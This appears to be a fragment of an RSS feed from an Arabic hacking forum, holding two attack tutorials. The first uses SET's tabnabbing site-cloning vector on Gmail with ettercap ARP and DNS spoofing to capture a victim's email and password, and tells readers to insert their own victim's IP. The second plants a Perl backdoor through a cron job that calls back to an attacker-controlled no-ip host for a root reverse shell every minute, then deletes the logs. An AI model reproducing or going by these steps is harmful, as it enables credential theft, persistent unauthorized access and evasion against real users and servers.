ماذا لو حاولنا ادخال بعض الخدع على هذا الهجوم ؟ :D &lt; اخلص علينا بس <br />
<br />
نعم و بدون اي تردد .. راح نستخدم الهجوم اللا مستغنى عنه من وجهة نظري المتواضعه ( سبوفينج )</b></font> <br />
<br />
<font color="Black"><b>طيب وش الفايده يا عامر ؟<br />
<br />
انا اقلك وش الفايده .. </b></font><br />
<br />
<font color="Black"><b>الفايدة تكمن في ان السبوفينج راح يتم بشكل كلي .. اي بمجرد دخوله لاي صفحة سوف يتم تحويله الى الـصفحة المحقون فيها شفرة لعمل الـ</b></font> <font color="Red"><b>Tabnabbing</b></font> .. <br />
<br />
<font color="Black"><b>و بما ان الصفحة توهم الضحية برسالة please wait .. و كانما الضحية ينتظر الصفحة ليبدا التصفح بشكل طبيعي .. و لكن عندما يتاخر الرد .. سيحاول ان يفتح اطار آخر</b></font> ( <font color="Red"><b>Tab</b></font><font color="Black"><b> ) و عندما يتم فتح هذا الاطار الاخر .. سوف تتحول صفحة ( please wait  ) الى الموقع المراد ايقاع الضحية فيه و جعله يكتب بريده و كلمة المرور </b></font>:rolleyes:<br />
<br />
<br />
<br />
<font color="DeepSkyBlue"><b>----------------------------------------------------------------------------------<br />
</b></font><br />
<br />
<br />
<font color="Black"><b>الاداة المستخدمة في هذا الموضوع .. كالعادة هي اداة</b></font>  <font color="Green"><b>Social-Engineering Toolkit</b></font> <br />
<br />
<br />
<font color="Black"><b>نبدا على بركة الله شرح الخطوات لتنفيذ هذه الطريقة .. <br />
<br />
نذهب الى التيرمنال .. و ندخل هذا الامر للذهاب الى مسار الاداة ..</b></font><br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left"><font color="DarkOrange"><b>cd /pentest/exploits/SET</b></font></code><hr />
</div><font color="Black"><b>ثم ندخل هذا الامر لتشغيل الاداة بعد الوصول الى المسار المحدد .. </b></font><br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left"><font color="DarkOrange"><b>./set</b></font></code><hr />
</div><font color="Black"><b>راح يطلع لك مثل هاللي بالصورة .. <br />
</b></font><br />
<a href="http://www.arab4services.net/forums/showthread.php?t=2453" ><img src="http://img85.imageshack.us/img85/683/snapshot1ha.png" border="0" alt="حصري ولأول اختراق حسابات المستخدمين" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
<font color="Black"><b>مثل ماهو وآضح الآن .. امامنا عدة خيارات نختار منها رقم 2 (</b></font> <font color="Red"><b>Website Attack Vectors</b></font> <font color="Black"><b>)</b></font><br />
<br />
<font color="Black"><b>نشوف الصورة بعد اختيار هذا الخيار .. <br />
</b></font><br />
<a href="http://www.arab4services.net/forums/showthread.php?t=2453" ><img src="http://img691.imageshack.us/img691/6955/snapshot2xh.png" border="0" alt="حصري ولأول اختراق حسابات المستخدمين" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
<font color="Black"><b>ظهر لنا عدة طرق لعمل هذا النوع من الهجوم .. شوفوا انا محدد هجومنا اليوم ..<br />
<br />
و طبعا الطريقة الاولى و الثانية شارحها بمواضيع سابقة لي .. و باقي الطرق راح نتطرق لها باذن الله في دروس جاية !<br />
<br />
نختار الخيار رقم 4 مثل ما انا محدد بالظبط .. و نشوف الصورة بعد ما نختار هالخيار !</b></font><br />
<br />
<a href="http://www.arab4services.net/forums/showthread.php?t=2453" ><img src="http://img835.imageshack.us/img835/4069/snapshot3.png" border="0" alt="حصري ولأول اختراق حسابات المستخدمين" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
<font color="Black"><b>^<br />
<br />
الآن ظهر لنا 4 خيارات جديدة خاصة بطريقة تزوير الصفحة المراد اظهارها للضحية .. و طبعا يفضل اختيار الخيار الثاني .. اللي هو استنساخ الصفحة و تزويرها بمجرد كتابة الدومين ..<br />
<br />
نختار الخيار الثاني و نشوف الصورة .. </b></font><br />
<br />
<a href="http://www.arab4services.net/forums/showthread.php?t=2453" ><img src="http://img576.imageshack.us/img576/5232/snapshot4o.png" border="0" alt="حصري ولأول اختراق حسابات المستخدمين" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
<font color="Black"><b>طلب مني كتابة دومين الصفحة المراد استنساخها ثم تزييفها للضحية .. <br />
<br />
فكتبت له <a href="http://www.gmail.com" target="_blank">www.gmail.com</a> بافتراض اني اريد حساب شخص على بريد الـجيميل !<br />
<br />
نكبس انتر ليتم تزوير الصفحة و نشوف وش يظهر لنا .. <br />
<br />
صورة </b></font><br />
<br />
<a href="http://www.arab4services.net/forums/showthread.php?t=2453" ><img src="http://img443.imageshack.us/img443/228/snapshot5d.png" border="0" alt="حصري ولأول اختراق حسابات المستخدمين" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
<font color="Black"><b>الآن .. عملية الهجوم تمت بنجاح و تم تكوين سيرفر على الآي بي تبعك دآخل الشبكة على البورت 80 وهو بانتظار اي ضحية يقع في هذا الشرك .</b></font>. <br />
<br />
<br />
<br />
<font color="DeepSkyBlue"><b>-----------------------------------------------------------------------------------------<br />
</b></font><br />
<br />
<br />
<font color="Black"><b>الآن راح نشرح على السريع خطوات عمل سبوفينج للاي بي تبعنا داخل الشبكة .. باستهداف اي بي الضحية دآخل الشبكة ايضا !<br />
<br />
اولا .. </b></font><br />
<br />
<font color="Black"><b>نفتح نافذة تيرمنال جديدة .. و ننفذ الامر التالي للتعديل على الملف etter.dns بالآي بي تبعنا داخل الشبكة ( اللي تم عمل سيرفر عليه عن طريق الاداة ) &lt; ركزوا معي شوي</b></font> :D<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left"><font color="DarkOrange"><b>nano /usr/share/ettercap/etter.dns</b></font></code><hr />
</div><font color="Black"><b> صورة مع التحية خخخخخخخخخخ .. <br />
</b></font><br />
<a href="http://www.arab4services.net/forums/showthread.php?t=2453" ><img src="http://img685.imageshack.us/img685/4087/snapshot6q.png" border="0" alt="حصري ولأول اختراق حسابات المستخدمين" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
<font color="Black"><b>لاحظوا معي بعد ما نفذنا الامر .. فتح لنا الملف .. و لاحظوا ايضا اللي ماشر عليه بالابيض .. اي ما تم تعديله من قبلي بوضع الآي بي تبعي ..<br />
<br />
الآن احفظ شغلك كنترول+اكس ..<br />
<br />
نجي للامر الثاني .. و اللي هو تنفيذ هجوم الـ سبوفينج بكل اريحية و طلاقة !</b></font><br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left"><font color="DarkOrange"><b>ettercap -T -q -i wlan0 -M arp:remote -P dns_spoof /192.168.1.3/</b></font></code><hr />
</div><font color="Black"><b><br />
<br />
آلآمر تفصيليآ :<br />
<br />
<br />
-T = آستخدآم وآجهة آلنصوص بدلآ من آلوآجهة آلرسومية ..<br />
-q = عدم عرض محتويآت آلبآكيت ..<br />
-i = تحديد آلآنترفيس ( كرت الوايرليس )<br />
-M = لعمل هجوم mitm attack<br />
-P = لتحديد آلبلوجن آلمطلوب .. و هنآ حددنآ بلوجن آلسبوفينج<br />
<br />
و اذا تبي الزبده .. انسخ الامر مثل ماهو و غير الاي بي المستهدف باي بي ضحيتك .. و لا تنسى تغيير الانترفيس اللي هو في حالتي ( wlan0 ) &lt; بامكانك معرفة الانترفيس عن طريق مخرجات الامر ifconfig داخل التيرمنال تبعك !</b></font><br />
<br />
<font color="Black"><b>و هذي صورة توضيحية بعد تطبيق الامر و عمل السبوفينج !<br />
</b></font><br />
 <a href="http://www.arab4services.net/forums/showthread.php?t=2453" ><img src="http://img19.imageshack.us/img19/1249/snapshot7dw.png" border="0" alt="حصري ولأول اختراق حسابات المستخدمين" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
<font color="Black"><b>^<br />
<br />
it work fine <br />
<br />
الآن نحن فقط بانتظآر الضحية لدخول المتصفح .. و محاولة التصفح و الوقوع في الفخ المنصوب من قبلي ..<br />
<br />
نشوف صورة بعد ما تم وقوعه في الفخ .. <br />
<br />
طبعا بعد محاولة الدخول على حسابه في الجيميل .. </b></font><br />
<br />
<a href="http://www.arab4services.net/forums/showthread.php?t=2453" ><img src="http://img9.imageshack.us/img9/2357/snapshot8g.png" border="0" alt="حصري ولأول اختراق حسابات المستخدمين" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
<font color="Black"><b>^<br />
<br />
wow !!<br />
<br />
الايميل + الباسوورد وصلوا لك على طبق من ذهب .. و بدون اي تشفير و خرابيط !</b></font><br />
<br />
<br />
<br />
<font color="DeepSkyBlue"><b>--------------------------------------------------------------------------------------------------<br />
</b></font><br />
<br />
<br />
<font color="Red"><b>البرهان !</b></font><br />
<br />
<br />
<font color="Green"><b>بقي لي سيداتي و سادتي .. ان ابرهن لكم صحة كلامي بمقطع بسيط على اليوتيوب من صنعي !</b></font><br />
<br />
<br />
<a href="http://www.youtube.com/watch?v=aG1mTh6ClHQ" target="_blank">http://www.youtube.com/watch?v=aG1mTh6ClHQ</a><br />
<br />
<br />
<font color="Black"><b>يبدو لي ان الامور اتضحت بشكل كآمل الآن بعد هذا الفيديو البسيط و الواضح ..<br />
</b></font><br />
<br />
<font color="Black"><b>اي استفسارات او مشآكل .. انا موجود و بالخدمة</b></font> :D<br />
<br />
<font color="Black"><b>و كل عام و انتم بالف خير .</b></font><br />
<br />
<font color="Black"><b>اخوكم</b></font> <font color="DeepSkyBlue"><b>/</b></font> <font color="Black"><b>عامر</b></font> <br />
<br />
<font color="Red"><b>انتهى !</b></font></div></div>

]]></content:encoded>
			<category domain="http://www.arab4services.net/forums/forumdisplay.php?f=56">System Hacking</category>
			<dc:creator>Dr.LiNuX</dc:creator>
			<guid isPermaLink="true">http://www.arab4services.net/forums/showthread.php?t=2453</guid>
		</item>
		<item>
			<title><![CDATA[لآ ترجعً لروت " هوُ يرجعٌ لكُ]]></title>
			<link>http://www.arab4services.net/forums/showthread.php?t=2396&amp;goto=newpost</link>
			<pubDate>Fri, 06 Aug 2010 20:20:00 GMT</pubDate>
			<description><![CDATA[بسم الله الرحمن الرحيم 
 
السلام عليكم ورحمة الله وبركاته 
 
مـ،ـع آآول آيامـ هذه الشهر الكريم هذه الشهر المبارك 
 
آآود ان آبارك لكم "كل عام وأإنتم...]]></description>
			<content:encoded><![CDATA[<div><div style="margin:auto;text-align:center;"><a href="http://www.arab4services.net/forums/showthread.php?t=2396" >لآ ترجعً لروت &quot; هوُ يرجعٌ لكُ</a><br /><br /></div><div align="center"><font color="DarkRed">بسم الله الرحمن الرحيم<br />
<br />
السلام عليكم ورحمة الله وبركاته<br />
<br />
مـ،ـع آآول آيامـ هذه الشهر الكريم هذه الشهر المبارك<br />
<br />
آآود ان آبارك لكم &quot;كل عام وأإنتم بالف خير&quot;<br />
ورمضـــــــــــ كريم ــــــــــــــــــــــان<br />
وآسال الله ان يعيدهـ، عليكم سنين مديدهـ<br />
<br />
-=-=-=-=-=-=-=-=-=--=-=-<br />
<br />
مآآهي بالطويله .,<br />
<br />
كلنا لأ سحبـ، روتـ , يبي يرجع له , وفي الاغلبية<br />
آدأريين السيرفرات الايام هذه يعرفون طرق الرجوع  للسيرفر القديمه<br />
<br />
&quot;., لاكن هذه المره ومن طرقي : التي آسال عنها امام الله لم اراها من قبل<br />
<br />
السيرفر راح يرجع لنا او الروت راح يرجع لنا رجاله :cool:<br />
<br />
ندخل بحساب الجذر في السيرفر الي حنا مخترقينه<br />
<br />
ورأإحـ نحتاج<br />
N0-!p<br />
و<br />
backdo0r.pl<br />
<br />
:D<br />
<br />
الحين ارفع الباكدور مثال داخل<br />
<br />
/tmp<br />
<br />
<br />
<br />
<br />
ونكتب في سطر الاوامر<br />
<br />
crontab -e<br />
<br />
الكرون تاب<br />
<br />
راح تنفك لنا مثل الي في الصورهـ<br />
<br />
<a href="http://www.arab4services.net/forums/showthread.php?t=2396" ><img src="http://bamandbloom.com/images/111111111.png" border="0" alt="ترجعً لروت &quot; يرجعٌ" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
الان نكتب آآخر سطر<br />
<br />
هذه الامر<br />
<br />
<br />
* * * * * (perl /tmp/backdoor xxx.no-ip.com 443)<br />
<br />
وطبعن مع تغيير النو اي بي و البورت الي تبيه وانت فاكه :D<br />
<br />
<a href="http://www.arab4services.net/forums/showthread.php?t=2396" ><img src="http://bamandbloom.com/images/2222222222222.png" border="0" alt="ترجعً لروت &quot; يرجعٌ" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
<br />
وامسح اللوق وآآثرك كامل<br />
<br />
الحين السيرفر كل دقيقة راح يتصل بجهازك<br />
<br />
ونروح نتنصت على البورت الي حددناهـ<br />
<br />
ونشوف<br />
<br />
<br />
<br />
<a href="http://www.arab4services.net/forums/showthread.php?t=2396" ><img src="http://bamandbloom.com/images/333333333.png" border="0" alt="ترجعً لروت &quot; يرجعٌ" onload="NcodeImageResizer.createOn(this);" /></a><br />
<br />
تم الاتصال وبنجاح<br />
<br />
وبصلاحيات روت<br />
<br />
<br />
لا تنسونا بدعوهـ صالحه في ضهر الغيب<br />
<br />
وطبعن HaCkEr KsA يتوعد بكل جديد وغريب :rolleyes:<br />
<br />
في امان الله<br />
<br />
<br />
<br />
</font></div></div>

]]></content:encoded>
			<category domain="http://www.arab4services.net/forums/forumdisplay.php?f=56">System Hacking</category>
			<dc:creator>جبروت هكر</dc:creator>
			<guid isPermaLink="true">http://www.arab4services.net/forums/showthread.php?t=2396</guid>
		</item>
	</channel>
</rss>
